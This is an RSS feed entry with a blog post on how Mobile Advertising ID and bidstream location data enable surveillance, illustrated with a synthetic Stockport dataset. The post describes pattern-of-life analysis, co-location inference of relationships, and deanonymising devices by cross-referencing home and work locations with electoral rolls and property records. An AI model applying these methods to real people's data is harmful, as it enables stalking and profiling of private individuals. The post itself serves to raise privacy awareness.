<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[DFWORKS | Online Threat Mitigation]]></title><description><![CDATA[Preventing damages caused by cyberattackers, online disinformation distributors and propagandists.]]></description><link>https://dfworks.com</link><generator>GatsbyJS</generator><lastBuildDate>Wed, 26 Feb 2025 21:50:50 GMT</lastBuildDate><item><title><![CDATA[Winning Elections with MAID data]]></title><description><![CDATA[Introduction Having worked in intelligence, both in a government and private capacity, several recent articles have piqued my interest…]]></description><link>https://dfworks.com/blog/win_election_with_maid_data/</link><guid isPermaLink="false">https://dfworks.com/blog/win_election_with_maid_data/</guid><pubDate>Tue, 25 Feb 2025 12:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Having worked in intelligence, both in a government and private capacity, several recent articles have piqued my interest around Mobile Advertising IDs (MAIDs) and bidstream data. A recurring theme in the articles below (which are well worth reading) is that private intelligence agencies are widely leveraging bidstream data for what is essentially global surveillance.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://timsh.org/tracking-myself-down-through-in-app-ads/&quot;&gt;Tracking myself down through in-app ads&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://krebsonsecurity.com/2024/10/the-global-surveillance-free-for-all-in-mobile-ad-data&quot;&gt;The global surveillance free for all in mobile ad data&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.404media.co/hackers-claim-massive-breach-of-location-data-giant-threaten-to-leak-data/?ref=timsh.org&quot;&gt;Hackers claim massive breach of location data&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Bidstream data seems to be widely used by private intelligence agencies, but its use, unless I’m severely out of the loop, appears to be more prevalent in the US, where there are fewer regulatory hurdles. In contrast, UK privacy laws like GDPR make handling such datasets significantly more risky. The legal and ethical concerns surrounding bidstream data are well-documented elsewhere, but I want to take a practical look at how the aggregation and analysis of this data amplifies risks, making it even more dangerous than some may realise.&lt;/p&gt;
&lt;p&gt;Mobile Advertising ID (MAID) data has typically been seen as a tool for targeted advertising, but its aggregation and analysis raise significant concerns. Large datasets enable the tracking of individuals, the inference of behaviors, and even the modeling of political affiliations. The modeling presented in this article is basic, probabilistic, and significantly reduced in complexity to demonstrate ‘the art of the possible’. It aims to demonstrate that with access to more data and greater resources, intelligence agencies or major tech companies could develop highly sophisticated models capable of achieving far more precise and nuanced outcomes.&lt;/p&gt;
&lt;h2&gt;Understanding MAID and Bidstream Data&lt;/h2&gt;
&lt;p&gt;Mobile Advertising IDs are persistent but resettable alphanumeric identifiers assigned to mobile devices. They were initially designed to enable advertisers to track user behavior without relying on directly identifiable information such as phone numbers or email addresses. In theory, this allows for targeted advertising while maintaining user anonymity.&lt;/p&gt;
&lt;p&gt;However, in practice, a thriving industry has emerged around the collection, enrichment, and resale of MAIDs. Marketing firms, data brokers, and advertisers routinely compile extensive lists of MAIDs, supplementing them with additional details - ranging from basic identifiers like names and emails to more invasive data such as social media profiles, precise GPS locations, and consumer behaviour insights. As a result, what was once an anonymous identifier has become a powerful tool for tracking individuals over time.&lt;/p&gt;
&lt;p&gt;Bidstream data originates from the real-time bidding (RTB) process, a system used in digital advertising where ad space is auctioned off in milliseconds before a webpage or app loads. For example, when you visit an article on The Sun, you might notice a grey space around the content that gets filled with an ad a second or two later. In that brief moment, information about your device is sent into an automated auction, where advertisers use complex algorithms to decide if you fit their target audience and, if so, place a bid to display their advert.&lt;/p&gt;
&lt;p&gt;This data exchange is largely invisible to users, yet it occurs every time an ad-supported app is used or a website with programmatic advertising is visited. Many common apps, including weather, fitness, and social networking apps, collect and transmit MAID data as part of this ecosystem. The issue is that this data is often shared openly, allowing not only advertisers but also virtually anyone involved in the ad-tech supply chain, such as data brokers and intelligence firms, to observe the auction and aggregate the data without actually placing any bids.&lt;/p&gt;
&lt;h2&gt;The Fallacy of Privacy Settings in Mobile Advertising&lt;/h2&gt;
&lt;p&gt;While MAIDs and bidstream data are technically anonymised, their sheer richness makes de-anonymisation trivial. Movement patterns, repeated locations, and app usage can quickly reveal the identity of a person, even without a name attached. Investigations into bidstream datasets have demonstrated that it is possible to establish precise movement profiles of individuals, highlighting where they live, work, and spend their leisure time.&lt;/p&gt;
&lt;p&gt;The potential for abuse is significant. Intelligence agencies, corporate entities, and even malicious actors can leverage bidstream data to monitor individuals, track dissidents, or infer political affiliations. Even when users opt out of tracking, there are often alternative device identifiers (such as IFV, device IDs, or app-specific identifiers) that can be exploited for cross-app tracking, further eroding the illusion of privacy controls.&lt;/p&gt;
&lt;p&gt;Beyond traditional ad-tracking mechanisms, many apps transmit unexpected data points such as screen brightness, battery levels, and motion sensor data. These seemingly minor signals, when analysed in context alongside OSINT methods, can provide valuable insights into user behaviour.
Researcher Tim (tim.sh) has suggested that Uber may use battery level data to influence ride pricing. The theory is that users with lower battery levels are more likely to accept surge pricing, as they may fear their phone dying before they can request another ride. While Uber has denied this practice, it highlights how seemingly inconsequential data points can be monetised&lt;/p&gt;
&lt;h2&gt;Warrantless Surveillance and the Use of Bidstream Data in Investigations&lt;/h2&gt;
&lt;p&gt;Babel Street and its subsidiary, Atlas, have leveraged MAID data to conduct location-based tracking of individuals near sensitive locations, including mosques, courtrooms, and abortion clinics. This data, typically sourced from mobile applications, allows for near real-time geolocation monitoring without the need for direct user consent or judicial authorisation.&lt;/p&gt;
&lt;p&gt;A particularly concerning instance of this practice involved investigators using MAID data to track jurors in a New Jersey courtroom. By analysing the location signals from mobile devices, investigators were able to determine not only the presence of jurors at the courthouse but also their movements before and after trial proceedings. This level of surveillance raises significant ethical and legal concerns, as it could be used to exert undue influence, monitor private behavior, or compromise the integrity of judicial processes.
The primary legal concern surrounding the use of MAID data in this manner is the lack of regulatory oversight. Unlike traditional surveillance techniques, which require warrants or legal justification, MAID-based tracking is often conducted without scrutiny. Anybody can purchase such data from third-party vendors for around £10,000.&lt;/p&gt;
&lt;p&gt;The tracking of individuals near religious sites, medical facilities, and legal institutions raises civil liberties concerns, particularly regarding privacy rights and potential discrimination. The ability to monitor individuals based on their location near a mosque, for instance, could enable religious profiling, while tracking individuals near abortion clinics in US states where it has been outlawed could be used to intimidate or target those seeking medical care.&lt;/p&gt;
&lt;p&gt;Without clear regulatory safeguards, the commercial availability of MAID data enables extensive surveillance capabilities with minimal accountability. Experts with more knowledge of this subject matter than I have called urgently for legislative intervention to establish stricter controls on how location data is collected, sold, and used by both private entities and government agencies.&lt;/p&gt;
&lt;h2&gt;Synthetic Data Generation&lt;/h2&gt;
&lt;p&gt;Accessing authentic MAID data in the UK is prohibitively expensive and fraught with legal complications, effectively rendering it off-limits for research or experimentation. Therefore, I created a synthetic dataset designed to mimic real-world patterns. Although this synthetic data is almost certainly markedly different from actual MAID/bidstream data, it still incorporates similar fields and exhibits enough variability and randomness to facilitate basic modelling and illustrate privacy concerns.&lt;/p&gt;
&lt;p&gt;For those interested in the underlying methodology, the code used to build this dataset is available &lt;a href=&quot;https://github.com/dfaram7/synthetic_bidstream/blob/main/snippet&quot;&gt;here&lt;/a&gt;. Developed using actual locations in Stockport, UK, it facilitates the random (with constraints) simulation of user movements and interactions within a realistic urban setting. &lt;/p&gt;
&lt;p&gt;To simulate realistic usage, fictional device personas are assigned based on common lifestyle behaviors. These personas dictate movement patterns and interactions with locations, as an example a user may be:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Foodie&lt;/strong&gt; - Frequently visits restaurants, cafés, and food markets.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Pub-goer&lt;/strong&gt; - Spends evenings at bars and pubs, often making late-night movements.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Commuter&lt;/strong&gt; - Follows a structured daily route between home and work locations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Shopper&lt;/strong&gt; - Regularly visits retail areas and shopping centers.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Smoker&lt;/strong&gt; - Pauses at convenience stores and designated smoking areas&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each persona follows a probabilistic movement model, meaning that their routines include both predictable behaviors (e.g., a commuter heading to work at 8 AM) and spontaneous deviations (e.g., stopping at a café). By incorporating stochastic elements, the dataset better reflects real-world unpredictability.&lt;/p&gt;
&lt;p&gt;The dataset is generated through a multi-step simulation process:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Geo-Spatial Mapping&lt;/strong&gt; - A map of Stockport is enriched with open source business and land use data from &lt;a href=&quot;https://overpass-turbo.eu/&quot;&gt;overpass turbo&lt;/a&gt;, including points of interest (e.g., restaurants, cafes, businesses).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Device Seeding&lt;/strong&gt; - Synthetic devices are distributed across residential areas, with each assigned a job, favourite locations and a persona.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Movement Simulation&lt;/strong&gt; - Devices interact with amenities, workplaces, and transit routes, following realistic daily schedules. Variations are introduced to account for weekends, holidays, and unexpected detours.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Bidstream Data Emulation&lt;/strong&gt; - The synthetic devices generate timestamped location pings from fictional applications (social media, weather app, dating app), replicating the kind of data observed in real MAID datasets. This includes signal frequency variations, dwell times, and movement speed to prevent artificial uniformity.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;By leveraging realistic user segmentation and geospatial modeling, this synthetic dataset enables experimentation with bidstream mechanics, ad targeting simulations, and behavioral analysis, all while avoiding the legal and ethical concerns tied to real-world MAID data usage.&lt;/p&gt;
&lt;h2&gt;Demonstrating the Predictive Power of Bidstream Data&lt;/h2&gt;
&lt;p&gt;Before diving into modelling, we can first explore some basic patterns within the dataset. These images show how location data clusters, how individual movement patterns emerge, and how co-location analysis can hint at relationships between devices.&lt;/p&gt;
&lt;p&gt;The first visualisation is a map displaying all data points in the dataset, revealing key clusters around residential areas, workplaces, and common travel routes. Since this dataset is based on real locations in Stockport, UK, we would expect to see concentrations near transport links, shopping areas, and hospitality venues which is mirrored in our fictional data. &lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/aedfd078c2b0ebeec4b0d1002dcfc7de/e5715/stockportone.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 71.62162162162163%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAIAAACgpqunAAAACXBIWXMAABJ0AAASdAHeZh94AAADI0lEQVQozy3SzW/adhgH8EhTpf4JO03asacepx0mddouu06d1MOmXaYepqmHSas6rcqlh2raVHXaFi1tOhLSqYQ2JAvvIakBg41fMMaAfz8bvwEOYGxCCC92DIRBtO/hOT0f6ZG+z8p8Pr+8vBwOhxPXnSwym/UHQ8O0zO6paZrdxRycW87IsDrmqXU5nU7c2dWeu1ArSzybibJUyWdFCfBlQkTjPJHlc2lazbIMrqw/1zxPKQmnWaTRLFc1TqjSosbYF8MlHo1GUAGQwHhIsYAiHz0jvSH8ZdjHiARKD+580b79uezf4plM1SrLPQwaScHCRk5/iR3XhTwHOYYFXC6GRPcpsOmRPWvU41/Ye4/aG0+U4I7095+FCiIBtqqhAIRKtdTAPl/i4dgWqIyERmpIGEQT9F9+495d++OP2h/eynsCzbZe75kGgtaPIjD+RmKOIBUSiMPxzFli17aFKsul9pQXa8C3K9z5zrnx/uT6O9qXX2FxnlPtkjwSJbsYJf+F/B6Rj8SQ9FGu3x+vOI5zftZXSErd3db9XvHJU/j7q+7aev/BQ+OP57HVYHFjJ4NlS+mk/2dEuvtt+5Nbrc8+zRwc6u3JSn+R8wFPYDn/Frf/uhyPC4Rerc+J4kwz5qiXA5uvxTSqbntDvwb4+99Pr12bvvcu5fed9OZXZ7uuDDmJOoZySYmEmWc+4hgvJPNEukR4gzCaKrX6fOItSjMFq9L94Rvng5tIONIwnP+rqpUpqGS1HKK+eQWpAC/jSipchCSdDtbWfqsj8QYeLMMS3yGhmeze/zoT8NXN6VVVk4lQJIHfI71Yl376kWOyEIup0V0RiXKJw8LWFlxdxaM+hMVBAzRI5ARgRZLUjYsltsdjKIuVvR0mvA8CO+XEAUwdyGhCELF6MtiK7Ovbm7V/NrhQmM1PCHYOtbmqn+nNwRKPRyOhCit0VMgcCHiqCgoV5lgkM0K3IDSoFnakH0c6cpGmxbe4yHhj8OVhjobN1tV7LtpSZFlv6RIEJ+2WqtWsZl2ty52zhqoAq3Wi907NXqfZMmlWLeaFfJZXFeviwv0PbbejMBizgxgAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Stockport MAID Data&quot;
        title=&quot;Stockport MAID Data&quot;
        src=&quot;/static/aedfd078c2b0ebeec4b0d1002dcfc7de/fcda8/stockportone.png&quot;
        srcset=&quot;/static/aedfd078c2b0ebeec4b0d1002dcfc7de/12f09/stockportone.png 148w,
/static/aedfd078c2b0ebeec4b0d1002dcfc7de/e4a3f/stockportone.png 295w,
/static/aedfd078c2b0ebeec4b0d1002dcfc7de/fcda8/stockportone.png 590w,
/static/aedfd078c2b0ebeec4b0d1002dcfc7de/e5715/stockportone.png 768w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Next, we examine the movement patterns of a single device over time. This visualisation highlights:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Primary locations&lt;/strong&gt; such as home, workplace, and frequent leisure spots.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Preferred routes&lt;/strong&gt; for commuting, errands, or social activities.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Temporal habits&lt;/strong&gt;, indicating when this individual is most likely to be in specific areas.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This type of pattern of life analysis is valuable for understanding user routines, potential deviations, and broader behavioral trends that could be leveraged for targeted advertising, surveillance, or predictive modeling.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/e02fef00ff06b8e8201e3196f72415ee/e1031/device47.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 83.78378378378379%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAIAAABSJhvpAAAACXBIWXMAABJ0AAASdAHeZh94AAADMUlEQVQ4yzXTaXeiOhgA4Pn/f+Ru0047erVuqGDYIaxJWAS1goIVBLG2naqDc2zOSb49ec+7fbtcLsfjMd+sjlVxOBzKqkzXm2SdPsfLeB1d31W8WMwW89nxtTpUh7Ioil3x8eujht/Ol0uWbT3Qc1UGITD0qAEZjMIJimTV7/OmbOiAASPA09BmLVdGWFcdOiterri+729vgsCpUteTW5Ir9lMKzMfFzkkzIwwJtjTkDUBAD0l3jAccHo5nnc3rF96Xuc49WeYEoQHRxg5WwVQyliyJhefE8OdiGFBuLAvxPR02WrjxyDTibfIHny/5Pp/L7blCSSG0HDM0uABJ9lztkUcajZONOQ1ZEEHgd1QiDhVKEPk0SW+Rj2/vpsao1D2tdz0PElc04IBARtLahvUUPMvBtBOGEjYUXeEIllzM5bvkhrMsa4uUKvZ9dUIC20a6pkLbNshMIhbr1T9y/7j+o7L4LsGuzA00ub0tNlf8+fmZ7fIJO5K4ES+BwFIcC3oO9nycpgQRx7F5P2mB5QMft7UZVFVNEKTNNrvifVmWx4OERUNkJiLPcbTL0XNbmK3MOLLnMfbDrrH56W4ZuBjC9cBNgeWZWba74tPp9JLnE6E5gV0BK03tnoajUAKepdih4xF96nbXWzXdWm46Yhd34nOLN9g601vOh/3O1TgN27zJKbagmirgWZsZ2NYYm8ByBDPtoYQy456c/GT95khpbrLVDX+87U29h7BqIIE4HrIwLbGjyXjc+rff/8HYHS5+VKP/peQBbhp6RAmL5kuxvI3nbpsacptDT9jtu87ImGqE2DjwdZnX6R7k/5Lc/+RFhwkeFNITMCXHD/lhfYtcVXt2Qg91GqYyCsb+FCwDw7dBCJ6QyGt0E7HfXXRn4ztNpzmoMlYzyaOv2X4/ImwQ30MxxwWtRex4AXS1RiR0YwMksedPsWS2Rfdvnm/BYR9Oui/pn5zP53NdOllRdCSSiAWkUTdp5VtTIiwTL8sTd2HE6TSKwqZwN572kKUYqlhuvxaj9vvrKeu27ctqX1Xn06mqqiiK4niV5/nr8bWepXJX1vv3/usjL4rP06mGvwEtSWT8PDUdBQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Device 47&quot;
        title=&quot;Device 47&quot;
        src=&quot;/static/e02fef00ff06b8e8201e3196f72415ee/fcda8/device47.png&quot;
        srcset=&quot;/static/e02fef00ff06b8e8201e3196f72415ee/12f09/device47.png 148w,
/static/e02fef00ff06b8e8201e3196f72415ee/e4a3f/device47.png 295w,
/static/e02fef00ff06b8e8201e3196f72415ee/fcda8/device47.png 590w,
/static/e02fef00ff06b8e8201e3196f72415ee/e1031/device47.png 803w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;By identifying instances where two or more devices consistently appear in the same locations at similar times, we can infer potential relationships. If this co-location occurs in a residential setting, it may suggest cohabitation, such as roommates or family members. If the overlap happens at public amenities, it could indicate social connections, such as friendships or dating relationships.&lt;/p&gt;
&lt;p&gt;By mapping these overlapping location patterns, we can infer:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Shared residences&lt;/strong&gt; (devices returning to the same address each night).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Regular joint activities&lt;/strong&gt; (frequenting the same venues or traveling together).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Possible workplace connections&lt;/strong&gt; (devices present at the same office or worksite).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;While this is a simple demonstration, at scale, such methods could be used for network analysis, law enforcement investigations, or commercial audience segmentation.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/ab7a4e3620e600c138b0baa1517e188b/108f8/colocation.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 66.89189189189189%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAIAAAAmMtkJAAAACXBIWXMAABJ0AAASdAHeZh94AAACbUlEQVQoz0XSWVPjRhQF4Pn//ySVh1ATCB6MZCxZ6m5JvakXLS3LktFm2Q5LjAkwNQwkTuXhPH4P99zz5f39/e3t9fHwcHh5Oh6etuOm7Zqha8dxGMah3w/9uBnbdjM0fdc8/vXw/HI8/n14+/76Ab985PDwoCSiCRVRQDTHMQDAxcDGyWROzhieEjDx3WkILKQu+12j83izb054s9tGwhNowYIbIkOhQ5lQ5tmSz3hkBaWrO5bUlDDfQzZXEWJO3WcnPD6O0dpVdAaWDssYoSBHFrZ/C6Al5QwYl7Sw3fPMMJY6i9XkWp3nXXrCu/ttBO3Ym0ZiCu1r5F/FCtAc6mjKElfpiEvkpbZpw/wWhoUzp9NVXX7iHz/e7+7+xNYUz/+YhxcYuywRWPhe5C/gLEQzmQlKcMQBoTPGLqLUdp15tcw/8dPhadiPQQwF8YSBrKDpKseCIAIDBgPkaBYWhWz6fFlA1X7Fw7Ufe6vb9Sc+Hp83u44bpBXgayc1SOTSk99CZdMYeMJziFUIJJVwFjRU0UKgCbusmtXp5vv7HU0jZQAxc2UICRyc+awMkwTEGolUgAB67pWPr4LmEncX8+XZctD/tb0dAxzECdPsBlKIPv7BXVY7AbZp4UiFZBIL6CDnLNC/ouL3GZusd8kJb++6uIJpJnl+jvW3pJKJhoxPE8VxDXkFqiJa8dltqZYlvYnP7MBq/237I/u7XpuvWl3GdJKSc2bczBAe+fYNsUILBH5f6bRX9ZDfbjJsnCv+y/8jeXl9Nh1PTFwUpsx4Y3iZhlVjlpmsU5YXad2usjpZ90W5EWWnqzEe/5nnT6/YkQlViSnUAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;colocation&quot;
        title=&quot;colocation&quot;
        src=&quot;/static/ab7a4e3620e600c138b0baa1517e188b/fcda8/colocation.png&quot;
        srcset=&quot;/static/ab7a4e3620e600c138b0baa1517e188b/12f09/colocation.png 148w,
/static/ab7a4e3620e600c138b0baa1517e188b/e4a3f/colocation.png 295w,
/static/ab7a4e3620e600c138b0baa1517e188b/fcda8/colocation.png 590w,
/static/ab7a4e3620e600c138b0baa1517e188b/108f8/colocation.png 777w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The above map shows two devices colocating at a Farm Cafe and in a residential area, it would be reasonable to assume that the owners of these devices have a relationship of some sort.&lt;/p&gt;
&lt;h2&gt;Behavioural Profiling&lt;/h2&gt;
&lt;p&gt;At present, our raw bidstream data is structured as follows:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/9cafe0e79eacdaf5a1f3d23eddb63f3a/40040/raw.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 70.94594594594594%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAIAAACgpqunAAAACXBIWXMAABJ0AAASdAHeZh94AAAB6klEQVQoz1WTiY6qMBSG5/1fzlFZFCilRSnCsIOD43Y/wBtjE5Jytn858PV4PK7X62M+l8tlvIxT5G86t9ttGIbb/f58Ps/nM1kuBJ//zxcvJLhRt1qtrO32dDp9r76ljJgiw9B13SzLokhuNhuTJNvt1hjD6KmZh6JlttI6z7NTmmqt67oiOP7+ChEcDoe+78JQaB1rrbgURfnR3PeDCMPUJGlqPM8Dn2DXtvv9XilFMyxo9n1/B5c8fzXfZ1Vd1/mBOB7iONZU5FlGsGlq27aVVmVZOq4jZRgEQRRFi/JXM+B930cqymBtjAhENjeDHPg+tBmN7Egp5qJ5semN3DSNZdlKRYzHmyRJJiOGwbas/W5XVRVBy7I26zVCuq7/QG7bFm0/OZZl8SGmejaih+QxSfqu00pBIZ68rMdx/DAMVbbtxDGWq/V6UxQFQTxnf0CVZUFQCOE6mGD/zNk3bZDZ0M+0q9MictFCEOfJBsEknlUbk8Looxlkz/OT4xHZjusuyG3TuK6DkSyS/fm453l7z2vn0e/mqiynPacGWVJKMCfNXcdueMVe1AoRSjyQsq7qj2bkIYk9GZMwHCIT7bphNxgJbbIyZH7I5W3YC7mqKGLPqGZ4U9fzl9MCi1R+mSRBESfiM6rn7D/vUgfzlkBwrwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;raw&quot;
        title=&quot;raw&quot;
        src=&quot;/static/9cafe0e79eacdaf5a1f3d23eddb63f3a/fcda8/raw.png&quot;
        srcset=&quot;/static/9cafe0e79eacdaf5a1f3d23eddb63f3a/12f09/raw.png 148w,
/static/9cafe0e79eacdaf5a1f3d23eddb63f3a/e4a3f/raw.png 295w,
/static/9cafe0e79eacdaf5a1f3d23eddb63f3a/fcda8/raw.png 590w,
/static/9cafe0e79eacdaf5a1f3d23eddb63f3a/40040/raw.png 616w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;While real-world bidstream data purchased from brokers often contains a far richer set of attributes, our synthetic dataset serves as an approximation of the kind of sensitive information being shared. It includes timestamped latitude/longitude coordinates, device IDs (which, in this case, act as a proxy for MAIDs), and app data which would more often than not be found in programmatic advertising bidstreams. This simplified version still demonstrates the potential risks associated with such data, even without the full breadth of fields available in commercial datasets.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/b49cc41b0263d097d8632e5708c0bb8e/73fd0/real.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 33.108108108108105%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAIAAACHqfpvAAAACXBIWXMAABJ0AAASdAHeZh94AAABUklEQVQY0z2O6W6CUBCFaZq0TUUUsHKpbLLviyA7tj/ERhF4Bd/B9086JLbJycmXe8/MHOzSdf0wTOqHa//wf+j/1F3BHl/DOJ5Op/v9jr1SPIG2OMnMKTSn2dkELEGzOMUQq0/w+cRosebwKTBlSEZ4enmvyhJbcbIVZqafyFbgxYXhxqLuAthhagZ7cN3fb7ZmkNZunPOKpdihpLsLGrVti5FIsILE2eWy6cMKw4s5xXKiDOZ1dxckpeoljKBqTmSFKYBkeGtemS0/jscjRrOSHxdRVsOYE6XgvGr7SRGmFZyN88baFaxkuFEGmY1sqnbISjpOrqfL7xQSdQ86wxNs5VWHYqWt4ctmwCk21OE0b8EIguZC4SUjIFFbIvH5jWiaBov3WdV8VfWhqJr68J3mZV7Ul66/9uP50nf92P6cs6KsmgMoKyqI5WXtB9HtdvsFpQZMdtneM8sAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;real&quot;
        title=&quot;real&quot;
        src=&quot;/static/b49cc41b0263d097d8632e5708c0bb8e/fcda8/real.png&quot;
        srcset=&quot;/static/b49cc41b0263d097d8632e5708c0bb8e/12f09/real.png 148w,
/static/b49cc41b0263d097d8632e5708c0bb8e/e4a3f/real.png 295w,
/static/b49cc41b0263d097d8632e5708c0bb8e/fcda8/real.png 590w,
/static/b49cc41b0263d097d8632e5708c0bb8e/73fd0/real.png 793w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;As previously discussed, there are companies that offer MAID data enriched with PII, allowing direct linkage between device activity and individual users. However, even without direct PII access, those familiar with OSINT (Open Source Intelligence) methodologies will recognise that public records can be leveraged to approximate device ownership.&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Residential Identification&lt;/strong&gt;: By cross-referencing observed home locations with publicly available property records, electoral rolls, or tenancy databases, one can infer probable owners or tenants of a given residential address.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Workplace Identification&lt;/strong&gt;: Similarly, using lat/lon coordinates observed during working hours, we can reverse engineer workplaces by matching frequent locations to known business addresses.&lt;/li&gt;
&lt;/ul&gt;
